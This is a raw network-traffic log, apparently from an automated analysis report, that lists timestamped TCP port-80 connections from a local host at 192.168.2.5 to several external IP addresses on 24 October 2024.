                                                                                            Oct 24, 2024 15:29:58.338866949 CEST8049949142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:29:58.339015961 CEST4994980192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:29:58.790205002 CEST4994980192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:29:59.807116985 CEST4996480192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:29:59.812659025 CEST8049964142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:29:59.812753916 CEST4996480192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:29:59.823642969 CEST4996480192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:29:59.829076052 CEST8049964142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:00.762973070 CEST8049964142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:00.803858995 CEST4996480192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:00.883157969 CEST8049964142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:00.883270979 CEST4996480192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:01.368786097 CEST4996480192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:02.396301985 CEST4997880192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:02.402152061 CEST8049978142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:02.402237892 CEST4997880192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:02.413759947 CEST4997880192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:02.419312000 CEST8049978142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:02.419388056 CEST8049978142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:03.346499920 CEST8049978142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:03.397600889 CEST4997880192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:03.467438936 CEST8049978142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:03.467521906 CEST4997880192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:03.929476023 CEST4997880192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:04.948317051 CEST4998680192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:04.954205990 CEST8049986142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:04.954332113 CEST4998680192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:04.961354017 CEST4998680192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:04.966730118 CEST8049986142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:05.905431032 CEST8049986142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:05.947504044 CEST4998680192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:06.026472092 CEST8049986142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:06.026667118 CEST4998680192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:06.027522087 CEST4998680192.168.2.5142.250.185.115
                                                                                            Oct 24, 2024 15:30:06.032977104 CEST8049986142.250.185.115192.168.2.5
                                                                                            Oct 24, 2024 15:30:11.057126045 CEST4998780192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:11.062668085 CEST804998769.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:11.062798023 CEST4998780192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:11.073523045 CEST4998780192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:11.079386950 CEST804998769.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:11.752505064 CEST804998769.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:11.790143967 CEST804998769.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:11.790254116 CEST4998780192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:12.585109949 CEST4998780192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:13.604022980 CEST4998980192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:13.609963894 CEST804998969.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:13.610059023 CEST4998980192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:13.620799065 CEST4998980192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:13.626173019 CEST804998969.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:14.308830023 CEST804998969.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:14.346739054 CEST804998969.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:14.346802950 CEST4998980192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:15.131947041 CEST4998980192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:16.150939941 CEST4999080192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:16.156848907 CEST804999069.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:16.156960011 CEST4999080192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:16.168088913 CEST4999080192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:16.173511028 CEST804999069.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:16.173588991 CEST804999069.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:16.846338987 CEST804999069.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:16.884025097 CEST804999069.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:16.884115934 CEST4999080192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:17.678862095 CEST4999080192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:18.697947025 CEST4999180192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:18.703614950 CEST804999169.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:18.703694105 CEST4999180192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:18.710788965 CEST4999180192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:18.716345072 CEST804999169.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:19.376859903 CEST804999169.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:19.416264057 CEST804999169.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:19.416430950 CEST4999180192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:19.417253017 CEST4999180192.168.2.569.57.163.227
                                                                                            Oct 24, 2024 15:30:19.424813986 CEST804999169.57.163.227192.168.2.5
                                                                                            Oct 24, 2024 15:30:24.465456009 CEST4999280192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:24.473776102 CEST80499923.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:24.473881960 CEST4999280192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:24.489821911 CEST4999280192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:24.496560097 CEST80499923.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:25.459258080 CEST80499923.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:25.459455967 CEST4999280192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:25.991416931 CEST4999280192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:25.997325897 CEST80499923.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:27.009804964 CEST4999380192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:27.015259027 CEST80499933.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:27.015408993 CEST4999380192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:27.026582003 CEST4999380192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:27.031979084 CEST80499933.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:27.641838074 CEST80499933.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:27.641921043 CEST4999380192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:28.538274050 CEST4999380192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:28.543977976 CEST80499933.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:29.557113886 CEST4999480192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:29.562522888 CEST80499943.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:29.562683105 CEST4999480192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:29.573106050 CEST4999480192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:29.578447104 CEST80499943.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:29.578577042 CEST80499943.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:30.190145016 CEST80499943.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:30.190274954 CEST4999480192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:31.085441113 CEST4999480192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:31.091286898 CEST80499943.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:32.103667021 CEST4999580192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:32.110318899 CEST80499953.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:32.110445023 CEST4999580192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:32.117247105 CEST4999580192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:32.122842073 CEST80499953.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:32.736443043 CEST80499953.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:32.737035036 CEST80499953.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:32.737236977 CEST4999580192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:32.739347935 CEST4999580192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:30:32.744693041 CEST80499953.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:30:38.071335077 CEST4999680192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:38.076673031 CEST8049996162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:38.076756001 CEST4999680192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:38.088742971 CEST4999680192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:38.094144106 CEST8049996162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:38.835983992 CEST8049996162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:38.836030960 CEST8049996162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:38.836138010 CEST4999680192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:39.600567102 CEST4999680192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:40.620275974 CEST4999780192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:40.625757933 CEST8049997162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:40.625838041 CEST4999780192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:40.639650106 CEST4999780192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:40.645003080 CEST8049997162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:41.357713938 CEST8049997162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:41.357779026 CEST8049997162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:41.358127117 CEST4999780192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:42.147502899 CEST4999780192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:43.167229891 CEST4999880192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:43.174261093 CEST8049998162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:43.174427032 CEST4999880192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:43.187164068 CEST4999880192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:43.194323063 CEST8049998162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:43.194736004 CEST8049998162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:43.924860001 CEST8049998162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:43.924890041 CEST8049998162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:43.925002098 CEST4999880192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:44.694386959 CEST4999880192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:45.715126991 CEST4999980192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:45.722336054 CEST8049999162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:45.722520113 CEST4999980192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:45.731126070 CEST4999980192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:45.736597061 CEST8049999162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:47.324660063 CEST8049999162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:47.325606108 CEST8049999162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:47.327075005 CEST8049999162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:47.327163935 CEST4999980192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:47.327163935 CEST4999980192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:51.548084974 CEST8049999162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:51.553428888 CEST4999980192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:51.582247972 CEST4999980192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:51.587678909 CEST8049999162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:56.743186951 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:56.748634100 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:56.748698950 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:56.762798071 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:56.768256903 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455123901 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455192089 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455228090 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455262899 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455296993 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:57.455301046 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455355883 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455482960 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:57.455629110 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:57.456721067 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.456845999 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:58.272471905 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:59.291122913 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:59.296582937 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:59.297559977 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:59.309420109 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:59.314858913 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.032210112 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.032474995 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.032490015 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.032527924 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:00.032597065 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.032639980 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:00.032774925 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.033045053 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.033091068 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:00.035805941 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.035857916 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:00.819188118 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:01.837855101 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:01.843352079 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:01.843473911 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:01.854455948 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:01.859929085 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:01.859941006 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537142992 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537198067 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537235975 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537244081 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:02.537261009 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537282944 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537298918 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537306070 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:02.537363052 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:02.538166046 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.538218975 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:03.381779909 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:04.401082993 CEST5000380192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:04.406733036 CEST8050003141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:04.406817913 CEST5000380192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:04.416120052 CEST5000380192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:04.421596050 CEST8050003141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:05.098718882 CEST8050003141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:05.101999044 CEST8050003141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:05.102102995 CEST5000380192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:05.102935076 CEST5000380192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:05.108267069 CEST8050003141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:10.135768890 CEST5000480192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:10.142676115 CEST805000476.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:10.142744064 CEST5000480192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:10.153763056 CEST5000480192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:10.159790039 CEST805000476.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:10.771032095 CEST805000476.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:10.771125078 CEST5000480192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:11.662992001 CEST5000480192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:11.669409990 CEST805000476.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:12.682164907 CEST5000580192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:12.687588930 CEST805000576.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:12.687678099 CEST5000580192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:12.700344086 CEST5000580192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:12.705724001 CEST805000576.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:13.323909998 CEST805000576.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:13.325212955 CEST5000580192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:14.209677935 CEST5000580192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:14.218564987 CEST805000576.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:15.230971098 CEST5000680192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:15.238051891 CEST805000676.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:15.238189936 CEST5000680192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:15.250274897 CEST5000680192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:15.256104946 CEST805000676.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:15.256634951 CEST805000676.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:15.868230104 CEST805000676.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:15.868400097 CEST5000680192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:16.756637096 CEST5000680192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:16.762384892 CEST805000676.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:17.815311909 CEST5000780192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:17.820756912 CEST805000776.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:17.820924044 CEST5000780192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:17.829683065 CEST5000780192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:17.835061073 CEST805000776.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:18.448698997 CEST805000776.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:18.449251890 CEST805000776.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:18.449306965 CEST5000780192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:18.452033997 CEST5000780192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:18.457467079 CEST805000776.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:23.482074976 CEST5000880192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:23.487453938 CEST80500083.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:23.491017103 CEST5000880192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:23.502937078 CEST5000880192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:23.508279085 CEST80500083.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:24.130917072 CEST80500083.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:24.130995035 CEST5000880192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:25.006751060 CEST5000880192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:25.012254000 CEST80500083.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:26.027913094 CEST5000980192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:26.033494949 CEST80500093.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:26.033588886 CEST5000980192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:26.051460028 CEST5000980192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:26.056977987 CEST80500093.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:26.671109915 CEST80500093.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:26.671195984 CEST5000980192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:27.553389072 CEST5000980192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:27.558913946 CEST80500093.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:28.577406883 CEST5001080192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:28.582866907 CEST80500103.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:28.582963943 CEST5001080192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:28.599558115 CEST5001080192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:28.605012894 CEST80500103.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:28.605118990 CEST80500103.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:29.232697010 CEST80500103.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:29.232800007 CEST5001080192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:30.144411087 CEST5001080192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:30.150085926 CEST80500103.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:31.150355101 CEST5001180192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:31.155874014 CEST80500113.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:31.157140017 CEST5001180192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:31.165919065 CEST5001180192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:31.171340942 CEST80500113.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:31.774564028 CEST80500113.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:31.775322914 CEST80500113.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:31.777250051 CEST5001180192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:31.781608105 CEST5001180192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:31.787064075 CEST80500113.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:36.808152914 CEST5001280192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:36.813730001 CEST8050012172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:36.813862085 CEST5001280192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:36.828985929 CEST5001280192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:36.834563017 CEST8050012172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:37.554816008 CEST8050012172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:37.566860914 CEST8050012172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:37.569678068 CEST5001280192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:38.334682941 CEST5001280192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:39.353420019 CEST5001380192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:39.358956099 CEST8050013172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:39.359054089 CEST5001380192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:39.374583960 CEST5001380192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:39.379934072 CEST8050013172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:40.068412066 CEST8050013172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:40.070826054 CEST8050013172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:40.070890903 CEST5001380192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:40.882029057 CEST5001380192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:41.901237011 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:41.907269955 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:41.907561064 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:41.922687054 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:41.928319931 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:41.928379059 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:42.643667936 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:42.643974066 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:42.644030094 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:42.646450996 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:42.646507978 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:43.428459883 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:44.447395086 CEST5001580192.168.2.5172.67.177.220
